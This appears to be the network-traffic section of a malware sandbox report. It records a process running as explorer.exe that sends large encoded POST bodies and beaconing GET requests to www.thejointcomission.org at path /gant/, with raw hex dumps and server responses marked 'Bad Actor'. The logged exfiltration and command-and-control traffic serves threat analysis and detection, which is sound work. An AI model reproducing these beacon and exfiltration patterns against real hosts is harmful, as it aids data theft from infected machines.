56 76 56 66 73 6c 48 59 73 4f 54 55 39 43 43 59 47 6b 72 7e 33 58 50 53 7a 61 79 34 73 64 53 69 6e 4a 49 78 77 47 61 48 42 7a 2d 78 42 36 71 57 73 78 7a 31 65 69 6b 55 39 6e 4d 32 51 52 55 61 45 51 7a 50 55 43 6d 39 4d 35 63 44 7a 74 35 44 4a 36 6c 58 36 33 76 73 4f 59 49 36 70 46 33 59 4c 55 76 70 42 57 58 75 64 66 4a 68 6a 49 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=BSFDAM3g2fQW4NvYdXtXutIYj2X_wn5DVb7W5i(8OGoZjNeqmCHE8yWxJnWSM12GyqceVSvGj2~X92Zgy5TXoXQbu7NuOY27GgeNb963Yy2WVg91XjYLnJ5XHNbWDgPNM9Wi~q~na2iWNVEoZMNV(Sdv4m02oR2Nn9qUQCUi1zWocyBEy-1NIlbQWDBl9Rz1A1weG9szw2n-PLta8DfcJLRXDtCRHkJpF7n9WNtd62u55H0pSzt8lpi3TC3vRIJMIgK-WxMIeBNYTtCJf-oM4vWDDBm2kwNPMrB02iLW(EqLu5zzRSnZudxuyApZm1OiPXvcUla6Hik6VVNqfQ7jM1TncsUVUuPROF8Z(vsgn-rUQZZfotERe6VTv3ZxZlOY74Yfkmn8FvCrHqOcshAw4DMv2VvVfslHYsOTU9CCYGkr~3XPSzay4sdSinJIxwGaHBz-xB6qWsxz1eikU9nM2QRUaEQzPUCm9M5cDzt5DJ6lX63vsOYI6pF3YLUvpBWXudfJhjI.
                                                                                                                  Feb 13, 2023 19:02:41.451318979 CET1086INHTTP/1.1 403 Forbidden
                                                                                                                  server: openresty/1.13.6.1
                                                                                                                  date: Mon, 13 Feb 2023 18:02:41 GMT
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 175
                                                                                                                  x-fail-reason: Bad Actor
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  45192.168.11.2049892173.255.194.13480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:43.974339008 CET1099OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.thejointcomission.org
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.thejointcomission.org
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.thejointcomission.org/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 42 53 46 44 41 4d 33 67 32 66 51 57 34 4e 76 59 64 58 74 58 75 74 49 59 6a 32 58 5f 77 6e 35 44 56 62 37 57 35 69 28 38 4f 47 67 5a 6a 66 6d 71 6e 6c 7a 45 75 69 57 78 47 33 57 54 4d 31 32 68 79 71 45 43 56 53 54 38 6a 31 57 58 7e 6e 4a 67 7a 4c 37 58 6a 48 51 57 72 37 4e 73 45 34 33 6e 47 67 54 57 62 39 47 4e 59 42 71 57 55 6a 31 31 47 6b 45 49 34 4a 35 52 48 4e 62 4b 51 77 50 5f 4d 39 54 38 7e 71 79 6e 61 31 47 57 4d 6e 4d 6f 58 37 5a 56 6b 53 64 6f 78 47 30 44 68 78 32 30 6e 39 76 6c 51 43 55 49 31 79 69 6f 63 78 6c 45 7a 35 49 62 4c 46 62 51 66 6a 42 6d 35 52 33 78 41 78 70 44 47 39 59 7a 77 78 62 2d 4f 72 74 61 34 6d 72 64 50 72 52 64 48 74 44 4c 4e 45 46 78 46 5f 33 44 57 4e 35 64 36 6d 36 35 6f 6c 63 70 56 52 46 38 37 5a 69 31 64 69 33 77 62 6f 49 50 49 67 61 69 57 79 31 39 65 47 4e 59 54 49 32 4a 4e 72 63 50 71 50 57 61 50 68 6e 79 67 77 42 39 4d 71 77 72 32 69 4b 54 28 46 7e 4c 75 4a 44 7a 51 57 4c 59 75 4e 78 6a 7e 67 6f 62 73 51 57 73 50 58 6a 71 55 6c 6a 6e 48 6a 67 36 61 56 4e 71 62 33 6e 67 58 31 54 61 44 63 55 48 61 4f 4f 4a 4f 46 68 79 28 74 41 61 6d 50 33 55 66 4a 70 66 73 39 45 57 56 36 56 58 6c 58 5a 7a 64 6c 4f 59 37 34 55 74 6b 6d 62 38 46 65 4b 72 47 5a 57 63 38 69 6f 77 36 44 4d 70 32 56 76 41 66 73 5a 4b 59 73 47 39 55 34 4c 70 59 45 49 72 7e 44 54 50 66 53 61 78 75 73 63 61 7a 58 4a 68 73 67 37 59 48 46 54 32 78 42 71 55 57 62 42 7a 30 65 79 6b 51 39 6e 44 7a 77 52 54 54 6b 51 6c 4c 55 65 36 39 4d 6b 72 44 7a 78 70 44 4f 47 6c 54 72 43 30 37 39 77 4f 70 49 35 31 59 37 51 67 33 42 57 4e 7a 39 6e 6a 30 6a 6f 65 32 30 49 57 4e 53 69 4f 34 64 52 37 52 61 38 2d 33 71 44 64 54 61 4b 37 46 44 79 71 4d 6a 57 55 75 73 69 38 78 50 34 73 51 4d 64 52 75 74 6b 67 31 69 4e 4d 33 34 54 39 45 49 28 5a 6e 6e 6c 4e 43 56 53 2d 71 47 55 38 47 63 37 36 6d 6d 37 4a 64 47 76 55 4c 63 6d 55 39 38 61 63 4d 61 7a 6a 51 30 6e 68 50 50 43 6a 43 35 56 65 57 34 4c 59 50 78 63 66 69 55 71 6c 72 51 35 49 72 54 35 70 75 66 55 52 78 66 69 64 47 4b 74 4e 34 4b 34 57 31 4f 6a 73 71 69 70 52 7e 50 35 78 52 71 7e 66 78 30 50 61 6e 42 52 47 36 7a 45 7a 4e 46 4a 31 59 4b 48 6c 33 50 6d 38 4a 44 69 6b 4c 5f 4f 63 48 52 45 57 47 77 6d 65 72 33 6c 4d 57 49 55 47 61 34 46 42 59 6e 44 41 74 30 4d 4c 6b 70 30 76 36 7a 73 52 63 54 5a 66 79 72 59 57 42 49 65 39 6a 69 61 67 76 2d 74 5f 79 7a 41 6d 50 7a 52 35 43 4d 49 6d 35 4e 55 7a 56 36 30 4a 35 46 56 63 75 6b 35 65 47 4d 41 57 6d 4e 68 4a 71 74 38 47 68 32 78 56 51 55 59 4a 72 75 6b 37 50 6d 78 6c 6b 64 77 52 61 4c 32 6d 71 71 67 52 6f 36 55 43 6d 63 38 45 44 4a 39 77 45 4d 78 52 55 45 61 51 42 33 79 71 6b 66 49 77 41 6d 46 38 63 41 58 65 34 55 36 78 58 30 33 6d 6d 4c 79 55 6c 59 30 48 43 34 59 37 4e 47 39 70 36 30 4c 4b 63 5f 52 36 37 6a 70 34 37 4b 37 46 54 71 78 56 62 62 48 69 66 6d 46 6c 57 6b 28 66 4e 49 6b 67 4b 76 45 70 51 6d 6c 43 63 6c 4c 31 39 4b 63 4a 6b 33 6e 6f 72 6b 70 71 6e 32 46 32 6d 39 34 30 44 38 77 68 46 43 4e 79 66 71 71 43 31 65 6b 38 68 4c 48 38 4a 34 76 35 34 48 28 38 58 53 4c 39 42 44 61 6a 52 6f 79 30 33 74 73 52 35 42 39 66 4c 71 45 68 62 42 57 76 34 76 37 4f 7e 7a 76 56 52 38 6f 56 34 75 6c 4e 6c 4f 35 7a 6a 38 4f 6c 73 67 30 66 46 4f 61 78 47 62 42 47 42 6d 74 54 70 46 71 38 74 4f 47 7a 56 39 76 4d 6d 77 70 75 67 52 63 36 61 53 78 4b 4e 45 70 6e 41 53 6e 6f 35 61 62 41 66 47 52 71 74 56 6a 63 53 6b 68 49 36 6e 32 67 68 64 68 6d 5a 6f 69 70 7a 56 59 64 75 5f 31 77 55 79 41 66 5a 61 67 35 76 6e 35 30 5a 54 75 49 41 4a 34 79 65 58 6f 59 46 30 7e 35 52 39 59 5a 7e 51 70 4e 69 70 36 48 4d 66 4a 4e 41 68 52 42 4a 68 30 53 49 6c 4f 58 33 43 59 66 6a 77 47 4c 55 70 37 4d 71 51 6b 74 44 42 67 51 78 68 46 6a 78 6e 59 55 46 6b 67 55 39 42 4f 54 4a 49 6f 67 42 47 6d 63 50 4d 38 36 31 55 57 78 33 39 33 55 50 37 77 4f 6b 49 4d 5f 54 73 78 79 37 51 56 31 77 37 6b 56 45 63 58 34 61 30 5a 59 70 58 50 66 4b 58 76 4d 59 31 38 2d 57 37 55 6f 64 59 65 76 28 77 41 72 55 6a 67 6a 63 44 66 52 56 4f 62 69 77 79 5a 48 39 77 72 59 31 73 38 56 59 47 76 46 57 4c 50 5a 79 35 68 34 57 4d 37 56 74 7a 64 4e 5a 37 75 4d 45 7a 34 41 78 78 57 64 61 66 71 66 47 54 42 4b
                                                                                                                  Data Ascii: j-Jh9P=BSFDAM3g2fQW4NvYdXtXutIYj2X_wn5DVb7W5i(8OGgZjfmqnlzEuiWxG3WTM12hyqECVST8j1WX~nJgzL7XjHQWr7NsE43nGgTWb9GNYBqWUj11GkEI4J5RHNbKQwP_M9T8~qyna1GWMnMoX7ZVkSdoxG0Dhx20n9vlQCUI1yiocxlEz5IbLFbQfjBm5R3xAxpDG9Yzwxb-Orta4mrdPrRdHtDLNEFxF_3DWN5d6m65olcpVRF87Zi1di3wboIPIgaiWy19eGNYTI2JNrcPqPWaPhnygwB9Mqwr2iKT(F~LuJDzQWLYuNxj~gobsQWsPXjqUljnHjg6aVNqb3ngX1TaDcUHaOOJOFhy(tAamP3UfJpfs9EWV6VXlXZzdlOY74Utkmb8FeKrGZWc8iow6DMp2VvAfsZKYsG9U4LpYEIr~DTPfSaxuscazXJhsg7YHFT2xBqUWbBz0eykQ9nDzwRTTkQlLUe69MkrDzxpDOGlTrC079wOpI51Y7Qg3BWNz9nj0joe20IWNSiO4dR7Ra8-3qDdTaK7FDyqMjWUusi8xP4sQMdRutkg1iNM34T9EI(ZnnlNCVS-qGU8Gc76mm7JdGvULcmU98acMazjQ0nhPPCjC5VeW4LYPxcfiUqlrQ5IrT5pufURxfidGKtN4K4W1OjsqipR~P5xRq~fx0PanBRG6zEzNFJ1YKHl3Pm8JDikL_OcHREWGwmer3lMWIUGa4FBYnDAt0MLkp0v6zsRcTZfyrYWBIe9jiagv-t_yzAmPzR5CMIm5NUzV60J5FVcuk5eGMAWmNhJqt8Gh2xVQUYJruk7PmxlkdwRaL2mqqgRo6UCmc8EDJ9wEMxRUEaQB3yqkfIwAmF8cAXe4U6xX03mmLyUlY0HC4Y7NG9p60LKc_R67jp47K7FTqxVbbHifmFlWk(fNIkgKvEpQmlCclL19KcJk3norkpqn2F2m940D8whFCNyfqqC1ek8hLH8J4v54H(8XSL9BDajRoy03tsR5B9fLqEhbBWv4v7O~zvVR8oV4ulNlO5zj8Olsg0fFOaxGbBGBmtTpFq8tOGzV9vMmwpugRc6aSxKNEpnASno5abAfGRqtVjcSkhI6n2ghdhmZoipzVYdu_1wUyAfZag5vn50ZTuIAJ4yeXoYF0~5R9YZ~QpNip6HMfJNAhRBJh0SIlOX3CYfjwGLUp7MqQktDBgQxhFjxnYUFkgU9BOTJIogBGmcPM861UWx393UP7wOkIM_Tsxy7QV1w7kVEcX4a0ZYpXPfKXvMY18-W7UodYev(wArUjgjcDfRVObiwyZH9wrY1s8VYGvFWLPZy5h4WM7VtzdNZ7uMEz4AxxWdafqfGTBKpGaFX9MyTGS3eURTQn3eFFbQc9LV7BbvG-UYV0wvbzD_FigAU5l1DIYtVi3yZQyj8z3GOlWgIb8PwCaIt7qa7W2MSTCOeolq3O(6(a2sHVv_qOBcIaVL(svzAtfCfKSFzGMTG0fP2asjxRRBQPLM(eym4VxiBziizdrG9-GoS3h6AxkD3P0on14Qnx(1RT3InLQL~nsm5NUMtYwST_xPpDZXcM1sAMjjAR~_z3UwE7LriORU1Ow7aWfrnX7esvwhy_yubwy_j0jvU9ZK1inXnC0jKInFlz2wjP9QK5CVzyPHaznbejT1ZNrV0yDsdU3OeIlAgCaBrXgGcUMFYgcAOE(YDPcEnfH62mCTvmwNBCh1oMMTaOA4r7Ae78D5kt~rJlFIopHDLag4VQ3PgWtiFSMfLvHLIUsuknsXzzsvPPN9hpj6TwgkuQKjh7JoWOWATZjeNkeIpNYbLwcGLAM3(xGX1tb7(zEc0Bj5jOwkHcSjpOqUsLPU~lvOw2cnkedtz-nrC3bxOC00TEB-z-PsF1ylkSWKWm8tmN1_BnuIePiov12DrlegLexGbNmxMsyQMfHIt1hJzoYs5eGTi9mMQI7Rl4A9fvj60qp_lo~7dtSAb4MGOBYvpGE1Qp1tuJJ3RU3qMEGNWH1XakQfVv0S(un9mHoklWqu6Ly1qVlyvap7ukrWuDNR8OXCNaWWueFZkqLtLdGFzYCwinf5mo(qafuczblxo9Ws9BJujnWkbYQSIfShD-fIXFtIF6CptDaZAoumgSUs9kn_goOb5pkGaNpF4JBz0U89CYgKrgM8y94t3JxtivfPDoyNgI4eeylObDGBWv6rUC8FERKvxXtBWZ8_bjkSWkK7JEomFkpqNfRYg1(iijbWE8y35SK7x9kfqcFzUipk7l3Dx3r_JuP53EZIVVstjTPRTX4Cuh(0Yr4NEmt8xshOfgKwfv(jauD_5Ys6YUqMzgUF~L4htnbmXFnq9rC6nt8kLghE0yiQi7Jsvr0Tfualo-CqrkcE6Jkso01WDKBT(vWo2wngj1wu2GvZUqxEIbyhZcwn7qRUQqnIvTmY6As-2zw3(Zhh0HbVzBOqFWnTsorzVGze5NqUbZKysyTa7gfRZyJUT1zC0mIiJV1k6TlHpYc_b_DibX4HACKeT00-BO(ZA-Q-Sq(SbQT1Q-hFIC0O44HENAazEem6t3HOyispILM2FXzOgezUPx2TPwUipAn9WFSeTa205E8B5VwInU5QQwi8Ir~W9XzQY2a47AWXRaIU99(bw-VN0plZuujMr8HWyq(Eo935O-k0DVJ6GBFhmDjvvd0YpUX5CG9zKrm59kT7kf~wAQEQgP(9yNj8iOqyuKEkmllPB3(dkQo3QhrnaAa2Z6TRlL2nBH1t1nKvF0yf0wMDl_E62Zzx7fz3KCf8jjAyeJITBvMLTCAxrMA0kJIxj3yNJiOBNntT9vkGqKTkQZInWdX_PRs5aXOqiamY6oK55wFt9bNfzEA5xxapRXXPbgpzUf9J2HH1I0ajMQfVvErOtRyXvFgK~ZLDaJzrHCBlRjrygsBPsNkafv7nnvsuTmqIECukhvywKcqVqDua5407Iib7oCfhUtHW9uxEw84zKDxn7bhmZqP_0tijmHv5dn~NpQ0UTciMNqFSKe(WiYbkLx5epVUXcKVLp9kT0UsBWeI7EEtbD0i-iy(nUZtC9Va5TFwtgPi-5kJemANhlq4fDxVMzJH_jD~SGMXwxqdlgaIZ(9gzCE1HCbux1S4XJkxMm4I-WlhlLucJ4DBL8HGSBJo3p8vIpt(7D3mvGQzTARv3Q61cjYFXTeBernL7~NIBBZ0sj1e-BQRKJkzeiV3xBOvimyeE1jzR8B77whyqWj6Ad1i6NzVFfco4xhAjPqYgg4zyOokkyR~-BzUq2q~0VhWIbk9_awSdHwJUlh9SucIkZuT4vArWQqB2E_UJt3(0JgW98Iqn(v0rr7q1edYv0CQJlpzYSxvsTjU9DOndeI(bZwObSXHjc9xGKHXyTQhYMm4OkH(ly_SLBQrPt0Y6V6NA5h9tpCopAtSufsN0Rhu_nY4pJxTOBVd1Sz2G79D9h0CDALKZamsbxnslKALce_K5A3SuoI4eo3Wz27rJimoXm4yxwZHgs1sJfPK9Gg(4XO0GK1DWqddOGReXIxSKBl68jEo_2lO8rGxpQXcayh1B1Mhv6BKNhC05jtq3v7xd~8~sEzgpWoxEjO8Vmunq~hWlLTT7kxLBsNvF~TCVZ2oqv6L2kTht6NAV4P~qmUGo0rZQrpSGNBR-A6(WM5aato~J2Im4F8qllDIAMRUnjF6sr_XpzTxARrAu5XirkjFeBSaqzd7mHvCWIEkGGL8TV4UELNtVbqAoxQkWNQ11LVBvFt2mFi5VgKo6yGQ5Pq0_2Yg66sJ8mP2oNH~hZVf6AI5yCLfh3dupVy(QtZWXMCdKFBr0js8IrdWqDTW6mozI5jjqE-ox4LRkMijHcaTsUsdB6A4jvJLDVxxaTMCpUCiwwwsazo9soHldc2evljDankO1zX3CH8rz6Mm4BhLe4yp4z9Bf3OJtMdmqPXtnOUFTVwapkJG_2aNEKpqIVxM-yVvLehNQLvULTqNhHtEmm7QewUXRWwDduDJEMF3ZQvtsw0l4EZ25PmvHIS0R4kzBH1JamsgsFa8DgI2ZF0PKydNW1w4IN0D44Ms-7SYlqohqQNhAaFEmxWFDMVi
                                                                                                                  Feb 13, 2023 19:02:43.974436045 CET1105OUTData Raw: 63 42 7e 44 36 65 78 4b 75 53 4f 64 6e 42 77 69 39 67 53 45 7e 73 49 45 28 6a 4b 58 78 38 45 46 78 51 67 6b 34 6f 53 39 75 66 77 6f 64 55 6f 71 6c 63 61 65 63 37 6f 56 4e 70 4a 69 4f 6f 33 6b 6b 49 39 7a 4c 76 6f 69 76 4f 66 64 65 73 33 33 28 50
                                                                                                                  Data Ascii: cB~D6exKuSOdnBwi9gSE~sIE(jKXx8EFxQgk4oS9ufwodUoqlcaec7oVNpJiOo3kkI9zLvoivOfdes33(PobRyW32CwgR9ffs_sRwY4LfxuV811UNbXfdMFTNqazbSaowcHphs710ndWMuLvaVoB162AqjG2gKiMI4~zsa3CNDP9eCacPLT8qsCQCtdk~ScAF7HiQewxMzR65xqU62K20SZkBuPykg6irtRXpoyKpIytjLCVm3F
                                                                                                                  Feb 13, 2023 19:02:44.110533953 CET1108OUTData Raw: 5a 33 33 35 43 51 78 59 59 33 69 72 54 32 7a 5f 47 6d 48 37 78 64 6b 52 70 4d 6a 44 7a 4a 70 48 74 45 79 39 53 65 33 7a 51 4a 72 4a 35 6a 4d 4f 53 42 6a 6e 4e 79 69 44 75 52 75 74 41 50 75 56 79 30 48 6b 65 4d 7a 57 66 49 62 4b 4e 4a 70 66 6b 4d
                                                                                                                  Data Ascii: Z335CQxYY3irT2z_GmH7xdkRpMjDzJpHtEy9Se3zQJrJ5jMOSBjnNyiDuRutAPuVy0HkeMzWfIbKNJpfkMoIdbO8X3oaoScFYXmzqKL_1KUTZ0oUHX5f7pdgcIIQek7AqSoMnF9ZMQUn5zvsSTxxkX29QFWRh5Tz1IhzmpyPz0RCcrIbqRQqgQnFAvx8HQ3d990nUKA7PnxCa7VFhMF1LUptZQGyigszpTT4Y-e9ZinDqNdgxoe
                                                                                                                  Feb 13, 2023 19:02:44.110699892 CET1117OUTData Raw: 41 75 71 73 31 68 34 48 67 6b 4f 68 36 32 4c 49 76 36 46 32 4e 4a 53 32 79 47 76 44 62 4c 66 71 61 56 43 78 74 79 43 45 32 78 61 2d 66 62 58 44 77 7a 6c 57 65 4a 71 30 51 56 51 41 4c 48 62 7a 47 2d 48 63 48 2d 70 47 6c 6b 59 66 6b 52 47 52 79 55
                                                                                                                  Data Ascii: Auqs1h4HgkOh62LIv6F2NJS2yGvDbLfqaVCxtyCE2xa-fbXDwzlWeJq0QVQALHbzG-HcH-pGlkYfkRGRyUbj6A~-U7znRnUnhplTiDaKHDfVhTCo32KqI2Et5aEBYP0McIpO7cTcbpq6VFaAFTrSL9aftOJ2M0sb~BnA97NBN6nwyRAkHDJe0UBEaTzwwpFAJ-hFBkDULqPnyGWzL4xOkSvDTGAIxQjs(VUCrzQviVf1EkPgNfs
                                                                                                                  Feb 13, 2023 19:02:44.110872030 CET1126OUTData Raw: 6b 39 6d 6f 34 4c 45 2d 6e 6c 32 30 63 72 52 30 28 5f 6d 58 53 61 50 62 48 71 6e 42 37 53 34 48 44 55 67 71 79 79 42 41 77 38 52 41 4a 67 44 56 6d 43 63 76 38 33 49 78 30 34 77 6f 71 78 67 54 65 47 49 66 30 35 63 58 4c 58 56 4b 38 61 4a 6c 32 59
                                                                                                                  Data Ascii: k9mo4LE-nl20crR0(_mXSaPbHqnB7S4HDUgqyyBAw8RAJgDVmCcv83Ix04woqxgTeGIf05cXLXVK8aJl2YoFP51cKNScW0IOaVrxb9yx3qRylsaCdU(L(aQ9iRQF~LrXGmIB5oaMrKNp5I3EIovv~6LFP-T_n_D2ak1LXHRZde2LsRWLK9L7AAv3aKm2CpjkjXXi2N1ZzHcdTlylkae0d3ppy_QpQ22QZgRz(hrRAAkXury1ODk
                                                                                                                  Feb 13, 2023 19:02:44.110929966 CET1126INHTTP/1.1 413 Request Entity Too Large
                                                                                                                  server: openresty/1.13.6.1
                                                                                                                  date: Mon, 13 Feb 2023 18:02:44 GMT
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 205
                                                                                                                  x-fail-reason: Bad Actor
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
                                                                                                                  Feb 13, 2023 19:02:44.111047983 CET1131OUTData Raw: 52 41 4b 4c 69 74 69 41 45 72 6c 69 55 66 56 75 7e 70 69 54 4f 63 72 78 42 4b 51 42 66 48 39 33 61 6d 39 4b 6b 30 6b 33 54 31 78 62 35 47 72 4d 28 32 53 6f 4d 6e 58 56 6e 67 68 51 52 69 45 50 7e 2d 58 53 57 75 72 43 55 67 52 49 38 31 78 6e 39 79
                                                                                                                  Data Ascii: RAKLitiAErliUfVu~piTOcrxBKQBfH93am9Kk0k3T1xb5GrM(2SoMnXVnghQRiEP~-XSWurCUgRI81xn9yMaQv6pd8(yYj0sJze_eW5YrpsWRjai8aSxCe5FMOdMbcGzgbM0zZXWeRdQ3kRMQagOf4JOn5D1a50_hiHCWzDU5PNg0-x7lfwQ0H1pR5tppk4OLe~hSWbpmv7X8b17N9~8a9UBravxb7UoytvqH4NH7F2THkJNwC4
                                                                                                                  Feb 13, 2023 19:02:44.246790886 CET1134OUTData Raw: 66 31 52 64 4a 6e 7e 6f 66 46 5a 62 50 33 4a 30 44 4a 59 70 7a 67 41 68 56 35 52 2d 72 56 36 71 43 77 54 51 30 58 43 67 58 78 41 50 4b 70 39 39 72 59 30 4d 6f 51 79 6b 66 53 77 37 4a 63 6d 6e 67 6b 4e 31 4a 62 51 70 6b 6d 47 45 66 36 52 52 53 54
                                                                                                                  Data Ascii: f1RdJn~ofFZbP3J0DJYpzgAhV5R-rV6qCwTQ0XCgXxAPKp99rY0MoQykfSw7JcmngkN1JbQpkmGEf6RRST8sfD0QXNt9iIMeTmlmW0SDQq9B6iw2a6nop6OuOwSB5YvXYlH5cwc-35i3D44nNwqnKgqH3jKMQKHrN5hd7ZFYog(UVAB8ALU2sTnc354LBFrNwIGyfU79JCqxb-f2E-BHwy4_N0No7tEuTqa1R2R9EE3E5kVeYtA
                                                                                                                  Feb 13, 2023 19:02:44.246946096 CET1135OUTData Raw: 45 4b 73 45 56 32 28 38 7e 4c 59 68 48 68 56 77 65 46 34 70 6c 47 53 64 69 77 6c 41 5a 61 4b 4f 59 73 6d 4c 4f 69 66 66 4e 62 76 72 68 76 59 69 50 57 28 67 78 4e 63 62 46 55 77 31 57 50 74 49 46 46 6f 5f 32 41 6f 6e 52 53 6f 47 6a 33 59 6a 72 44
                                                                                                                  Data Ascii: EKsEV2(8~LYhHhVweF4plGSdiwlAZaKOYsmLOiffNbvrhvYiPW(gxNcbFUw1WPtIFFo_2AonRSoGj3YjrDSQ~c1yqHYPjWGJ(AV4oeHB5Uj0(li2EFrgmeyZseUq0SJ72Xj4D76ILoHA5rTH6aEFvx9XIM(2qXNtFGRAV6pVQsdSkj(pli5iM3IpSn(TCQpt4lMF(y3yBqrblMCX1SUDaj~Rft4U9u6jLVPjQfVYaXDhL_L3AEI
                                                                                                                  Feb 13, 2023 19:02:44.247003078 CET1142OUTData Raw: 6a 5a 75 38 62 5a 38 45 4b 42 38 52 48 32 43 63 6a 75 6d 32 35 2d 48 4d 70 71 30 72 4f 4a 32 50 63 56 65 77 45 63 46 76 5a 4d 43 6d 76 57 4d 4c 61 45 55 7a 64 4b 36 59 6f 54 47 52 43 67 57 54 67 46 7e 4e 43 46 31 69 53 42 6b 43 53 30 35 4a 35 7a
                                                                                                                  Data Ascii: jZu8bZ8EKB8RH2Ccjum25-HMpq0rOJ2PcVewEcFvZMCmvWMLaEUzdK6YoTGRCgWTgF~NCF1iSBkCS05J5zWVl_3MIaMiZIH1opVx9IrW67xJFr7HKFPIz3rPvsPJyNucsbxCxAfYpCnFU0HLVwuEC9RqJcl13KbkX16Hm_tHOQxuIOTKA44fbbeavD1HWlPcSyhQo6Nbnvep9RAhhLH5eBxk~5fhaXSDqPDXr2Xb7yUrY6yiqxg
                                                                                                                  Feb 13, 2023 19:02:44.247179031 CET1145OUTData Raw: 6b 44 41 6a 61 61 57 30 4b 47 4c 6f 38 72 74 71 73 6b 71 6d 38 6d 64 5f 77 35 49 6c 51 63 6d 78 77 6c 4b 46 78 74 4b 45 74 6a 71 53 7e 54 46 69 42 74 65 2d 7a 47 48 46 79 34 63 43 33 30 54 76 4b 58 44 61 64 4c 46 6f 48 73 59 37 4b 44 4e 61 67 31
                                                                                                                  Data Ascii: kDAjaaW0KGLo8rtqskqm8md_w5IlQcmxwlKFxtKEtjqS~TFiBte-zGHFy4cC30TvKXDadLFoHsY7KDNag1rI249yE26NI8Oel1AexsyFmElblmCkhYyufIz0mWd9pzm-I9WYIetnJIPjqGBl3pjJOQnwqsysiFW2oDKcQr1qfT~l6_ITcbTa5uvnhbpzO8JRD7eRPbJB(CQPSAa2pm3NkttH6oTTC0jEsnEeehi1KrLxT-FEiBn


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  46192.168.11.2049893173.255.194.13480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:46.627310991 CET1147OUTGET /gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.thejointcomission.org
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:02:46.762468100 CET1147INHTTP/1.1 403 Forbidden
                                                                                                                  server: openresty/1.13.6.1
                                                                                                                  date: Mon, 13 Feb 2023 18:02:46 GMT
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 175
                                                                                                                  x-fail-reason: Bad Actor
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


